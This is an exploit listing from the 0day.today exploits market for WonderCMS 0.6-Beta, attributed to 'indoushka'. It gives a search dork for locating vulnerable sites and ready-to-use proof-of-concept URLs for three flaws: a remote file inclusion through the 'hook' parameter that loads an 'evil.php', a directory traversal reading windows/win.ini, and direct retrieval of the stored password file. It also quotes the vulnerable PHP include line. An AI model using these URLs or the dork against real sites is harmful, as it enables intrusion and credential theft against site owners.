[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wonder CMS 0.6-Beta File Inclusion / Traversal / Disclosure Vulnerabilities

Author
indoushka
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23779
Category
web applications
Date add
22-06-2015
Platform
php
| # Title    : WonderCMS 0.6-Beta Multi Vulnerability
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : ©2015 Your website | Powered by WonderCMS | Login
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : http://wondercms.com/
=======================================

File inclusion :

Line 17 : <?php if(isset($_REQUEST['hook']))include($_REQUEST['hook']); ?>

http://127.0.0.1/wondercms/js/editInplace.php?hook=http://127.0.0.1/evil.php

Directory traversal :

Line 17 : if(changing)return;

http://127.0.0.1//wondercms/js/editInplace.php?hook=../../../../../../../../../../windows/win.ini

Password Disclosure :

http://127.0.0.1/wondercms/files/password

#  0day.today [2024-11-16]  #